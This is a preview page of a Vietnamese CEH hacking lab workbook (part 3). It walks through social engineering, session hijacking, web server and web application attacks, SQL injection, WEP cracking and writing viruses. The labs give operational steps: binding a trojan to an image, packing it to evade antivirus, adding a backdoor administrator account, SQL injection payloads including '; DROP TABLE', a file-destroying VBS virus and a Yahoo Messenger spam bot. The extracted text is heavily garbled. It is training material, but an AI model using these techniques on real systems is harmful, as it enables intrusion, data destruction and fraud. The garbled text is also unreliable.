1. Trang chủ
  2. » Công Nghệ Thông Tin

Giáo trình bài tập CEH - Phần 3

47 499 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 47
Dung lượng 4,45 MB

Nội dung

Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 74 Bài 7: Social Engineering I/ Gii Thiu K thut la đo (Social Engineering) là mt th thut đc nhiu hacker s dng cho các cuc thâm nhp vào các h thng mng, máy tính. ây là mt trong nhng phng thc hiu qu đ đánh cp mt khu, thông tin, tn công vào h thng. Di đây là câu chuyn có tht v mt trong nhng hacker ni ting nht th gii trong vài nm tr  li đây - Kevin Mitnick (M, tng b 8 nm tù vì ti tn công vào h thng máy tính), chuyên gia hàng đu v k thut Social Engineering. Lên k hoch tn công vào công ty X, Kevin vn dng k nng này đ dò tìm thông tin liên quan đn ông tng giám đc và mt tr lý ca ông này. Li dng lúc hai ngi đi công tác, anh ta s dng Call ID gi, nhái ging nói ca viên tr lý đ gi đn qun tr mng công ty, yêu cu gi mt kh u đng nhp vào h thng ca tng giám đc vì ngài đã quên mt khu. Qun tr viên kim tra mt vài thông tin v "viên tr lý", nhng Kevin đã có đ thông tin và s khôn ngoan đ tr li. Kt qu là Kevin đã ly đc mt khu và kim soát toàn b h thng mng ca công ty X. Mt hình thc la đo khác: Mt ngày xu tri nào đó, bn nhn đc đ in thoi, đu dây bên kia là mt ging nói ngt ngào: "Chào anh, dch v mà anh đang s dng ti công ty chúng tôi hin đang b trc trc vi account (tài khon) ca anh.  ngh anh gi gp thông tin v tài khon cho chúng tôi đ điu chnh li". Mi nghe qua tng nh đây là mt kiu la thô thin, nhng xác sut thành công rt cao, đc bit khi ging nói đó d thng nh my cô trc tng đài 1080! Phng cách la đo tng t là dùng k thut "Fake Email Login". V nguyên tc, mi khi đng nhp vào hp th thì chúng ta phi đin thông tin tài khon gm username và password ri gi thông tin đn mail server đ x lý. Li dng điu này, hacker đã thit k các trang đng nhp gi (Fake Login) đ các thông tin đc gi đn cho h. Tóm li, k thut Social Engineering rt đa dng, phong phú và cng ht sc nguy him do tính hiu qu và s ph bin. K thut này không đòi hi phi s dng quá nhiu yu t k thut, thm chí không có liên quan đn k thut thun túy (non-technical). Hacker có th thc hin phng cách này thông qua th tín, e-mail, đin thoi, tip xúc trc tip, thông qua ngi quen, các mi quan h cá nhân nhm dn d, khai thác các thông tin do vô tình b tit l t  phía ngi dùng.  VN, k thut này còn khá mi nên không him trng hp b đánh la mt cách d dàng. Chng hn nm ngoái, hàng lot game th MU Global đã mt sch sành sanh tài sn (o), khi ngây th đin thông tin tài khon ca mình vào mt e-mail gi mo admin MU ca hacker! (Trích dn) II/ Các bài Lab: Bài Lab 1: Gi email nc đính kèm Trojan Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 75  thc hin bài Lab này, ta s dng chng trình Mini-binder đ ghép file trojan vi hình nh, thay đi icon và chng trình Outlook đ gi email nc danh. Ghép file hình nh và file trojan, đu tiên ta to 1 file trojan, ly 1 file nh và file ico bt k đ ghép. Ta s dng lnh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ ghép file trojan svchost.exe vi cathu.jpg và vi icon là 60.ico. Tip theo, ta nén file trojan mi bng Winrar li nhiu ln đ tránh chng trình Anti- virus(tùy theo phiên bn Anti-virus, tuy nhiên hu ht các trojan không qua mt đc các chng trình này) và thay đi thông tin ca outlook. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 76 Ta vào ToolåOptionåMail setupåView Accountå Chn Account cn thay đi và thay đi thông tin Your Name và E-mail Address. Tip theo Attach file đính kèm vào và gi Email đi. Trong bài Tác gi gi ti đa ch email mailtestsniff@yahoo.com , và sau đó check mail đ kim tra th xem mail đã đn cha. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 77 Bài 8: Session Hijacking I/ Gii thiu: Nh ta đã bit v sniffer (nghe lén trong mng), Hacker có th ly bt k thông tin gì không đc mã hóa, hay có th fake CA đ có th ly thông tin trong giao thc HTTPS, bây gi ta có thêm 1 k thut na là session hijacking.  thc hin đc bài lab này trc tiên ta phi s dng ARP spoof, sau đó s dng phn mm T-sight hay Hunt đ giành ly session t phía máy nn nhân. II/ Thc hin bài Lab Trong bài Lab, tác gi s dng Vmware đ thc hi n, s dng máy đ th nghip TELNET và SSH. Còn 2 máy còn li 1 s dng Window 2000(đã cài sn tool T-sight) và 1 s Linux đ test SSH. Vic cài đt phn mm khá d dàng, bn cn phi thêm phn driver và chuyn v IP 192.168.200.0/24 do đang s dng bn Trial. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 78 Sau khi cài đt xong, trên máy 192.168.200.1 thit lp cho phép các máy khác telnet. Và t máy 192.168.200.2 telnet đn máy 192.168.200.1. Và d liu thu đc t máy 192.168.200.2, s dng tính nng Take Over trong Tool T-sight đ ly session. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 79 Sau khi Session b ly, session t máy Telnet s b “ Lost connection” và ngi s dng trong trng hp này không bit là mình b “Lost Connection “bi nguyên nhân nào. Bây gi ta bt Service SSH ca máy Linux bng lnh “ Service sshd” và test th session hijacking đi vi traffic ssh. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 80 Bài 9: Hacking Web Server I/ Gii thiu: Thông thng đ Hacking 1 Web Server, Hacker thng phi xem th Web Server đang chy h điu hành gì và chy nhng sercice gì trên đó, h điu hành thông thng là các h điu hành Win 2000 Server, Win 2003 Server, Redhat.v.v. Các Service bao gm Apache, IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca H điu hành b li hay service khác b li có th dn ti vic mt quyn kim soát ca h thng. Trong bài thc hành ca phn này, tác gi gii thiu li ca h điu hành là DCOM và li ng dng khác là Server-U, Apache(FTP Server). T nhng li này, ta có th kim soát hoàn toàn máy nn nhân. II/ Thc Hin bài lab. Bài Lab 1: Tn công Web Server Win 2003(li Apache)  bit đc máy Server ca h thng có b li hay không, ta s dng dng phn mm quét đ kim tra. (Phn này đã đc hc trong scaning). Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 81 Ta không thy thông tin v FTP Server  đây, do phn mm Retina ch có tính nng nhn din các Service ca Microsoft và nhng Service thông dng. Còn các Service không thông dng hn thì phn mm ch thy di dng m port. Trong trng hp này ta thy m port 21. Ta s dng Metasploit đ khai thác li Apache và ly đc (Console). Rank Vulnerability Name Count 1. echo service 1 2. ASN.1 Vulnerability Could Allow Code Execution 1 3. Windows Cumulative Patch 835732 Remote 1 4. Null Session 1 5. No Remote Registry Access Available 1 6. telnet service 1 7. DCOM Enabled 1 8. Windows RPC Cumulative Patch 828741 Remote 1 9. Windows RPC DCOM interface buffer overflow 1 10. Windows RPC DCOM multiple vulnerabilities 1 11. Apache 1.3.27 0x1A Character Logging DoS 1 12. Apache 1.3.27 HTDigest Command Execution 1 13. Apache mod_alias and mod_rewrite Buffer Overflow 1 14. ApacheBench multiple buffer overflows 1 15. HTTP TRACE method supported 1 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 82 Bây gi chúng ta s tìm cách Remote Desktop vào máy 192.168.200.1. Trc tiên ta to 1 user và add user này vào nhóm admin bng s dng lnh. Net user vsichao vsichao /add //thêm user Net Localgroup Administrators vsichao /add //đa user vào nhóm Admin Ta có th kim ta li bng lnh “ Net user” đ kim tra th user ca mình đã đc quyn admin hay cha. Tip theo ta th remote Desktop vào máy bng lnh “ mstsc /v 192.168.200.6” . Nu không đc ta s dng file Openrdp.vbs đ m Remote Desktop. Ta s dng chng trình Cisco TFTP Server đ đy file này Server nn nhân. S dng lnh tftp  máy nn nhân đ ly file Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 83 Add user vào và nâng quyn lên Administrator. Remote Desktop vào vi user là cehclass thành công, nh vy ta đã hoàn toàn kim soát đc máy nn nhân. [...]... Giáo trình bài t p C|EH Tài li u dành cho h c viên Bài Lab 4: Authorization Failure u tiên ta vào xem các account c a user “jc” password “jc789” Ta th y account Number là 520 432 0422040005, 520 432 0422040006, 520 432 0422040007, 520 432 0422040008 User jc ch quán lý c các account thông s trên Tuy nhiên ta chú ý n ph n URL khi s d ng tính n ng “View Transaction” VSIC Education Corporation Trang 89 Giáo trình. . .Giáo trình bài t p C|EH Bài lab 2: Khai thác l i ng d ng Server U T ng t nh bài trên, ta s d ng ch ng trinh nmap và s d ng metaesploit t n công VSIC Education Corporation Tài li u dành cho h c viên xác nh version c a ServerU Trang 84 Giáo trình bài t p C|EH Tài li u dành cho h c viên Bài 10: WEB APPLICATION HACKING I/ Gi i thi u: ng d ng Web... user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin') )-5 ) Run command SQL: run command b n có th dùng d u ";" Structure: VSIC Education Corporation Trang 93 Giáo trình bài t p C|EH Tài li u dành cho h c viên login page::::: user:' ; [command] -vd: '; DROP TABLE VTABLE-II/ Th c Hành Bài Lab Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web t n công vào Server... ; -; ; -; -; Tac Gia: Kevin Duong - KVD ; Phan Mem: DKC Bot ; Phien Ban: 1.1 ; Cong Dung: Quang cao Website thong qua Y!M ; Phat Hanh: 1-9 -2 006 ; -; Thiet Lap #NoTrayIcon $website = "http://daokhuc.be" ; Lay... Education Corporation Trang 85 Giáo trình bài t p C|EH Sau ó ta submit th y xu t hi n Tài li u dành cho h c viên post script này lên Ta s d ng F5 Refresh l i trình duy t và Lúc này trình duy t c a n n nhân vô tình ã th c hi n script c user post lên Server D a vào script này, tin t c có th n c p cookie c a n n nhân và log in vào h th ng Bài Lab 2: Insufficient Data Validation Trong bài Lab này khi chuy n ti... www.wildpackets.com/support/hardware/atheros30_driver i v i Cisco Aironet ta c ng download driver t trang web này Sau ó ta ti n hành cài t cho Card Wifi VSIC Education Corporation Trang 101 Giáo trình bài t p C|EH Ti p theo ta s d ng Airdump Tài li u dành cho h c viên thu packet t Access Point Ta ch n lo i Card là Atheros, Channel là 6 và output file là “hack.ivs” VSIC Education Corporation Trang 102 Giáo trình bài t p C|EH Tài... c tìm th y là Athen T key 128 bit, nh ng th i gian ch s lâu h n ng t nh v y i v i WEP WEP key 128 bit VSIC Education Corporation Trang 104 Giáo trình bài t p C|EH Tài li u dành cho h c viên Bài 13: VIRUS I/ Gi i thi u: (tham kh o bài c thêm) II/ Th c hành Lab: Bài 1: Virus phá h y d li u máy Ta có th vi t d dàng 1 virus phá h y máy b ng nh ng hàm Format hay delete trong ngôn ng VBS nh sau: msgbox"Error... Transaction” VSIC Education Corporation Trang 89 Giáo trình bài t p C|EH Tài li u dành cho h c viên Ta thay thông s 520 432 0422040005 b ng thông s 520 432 0422040004(thông s này không thu c account qu n lý c a user jc) Nh v y web site ang b l i phân quy n VSIC Education Corporation Trang 90 Giáo trình bài t p C|EH Tài li u dành cho h c viên Bài 11: SQL INJECTION I/ Gi i thi u v SQL Injection: ây là K... Education Corporation Trang 108 Giáo trình bài t p C|EH Tài li u dành cho h c viên Send("^v {ENTER}{ENTER}") Send("^m") Send("{DOWN}") Send("^{SHIFTDOWN}{END}{SHIFTUP}") Send("{ENTER}") Send("^v {ENTER}") BlockInput (0) EndIf Sleep(1800000) WEnd ; -; ; -D a vào o n code này, ta... C|EH Bây gi ta s d ng ch POST lên Server Tài li u dành cho h c viên ng trình Webscarab làm http proxy và thay i thông s c K t qu tr v t Server vi c chuy n ti n v n thành công VSIC Education Corporation Trang 87 Giáo trình bài t p C|EH Tài li u dành cho h c viên Ta ki m tra trong Transaction th y có l u l i vi c chuy n ti n Bài Lab 3: Cookie Manipulation Trong lúc login, ta xem trong Cookie có tham s . dn) II/ Các bài Lab: Bài Lab 1: Gi email nc đính kèm Trojan Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 75  thc hin bài Lab này, ta s dng. hin đc bài lab này trc tiên ta phi s dng ARP spoof, sau đó s dng phn mm T-sight hay Hunt đ giành ly session t phía máy nn nhân. II/ Thc hin bài Lab Trong bài Lab, tác gi. Server). T nhng li này, ta có th kim soát hoàn toàn máy nn nhân. II/ Thc Hin bài lab. Bài Lab 1: Tn công Web Server Win 2003(li Apache)  bit đc máy Server ca h thng có

Ngày đăng: 09/05/2014, 16:23

TỪ KHÓA LIÊN QUAN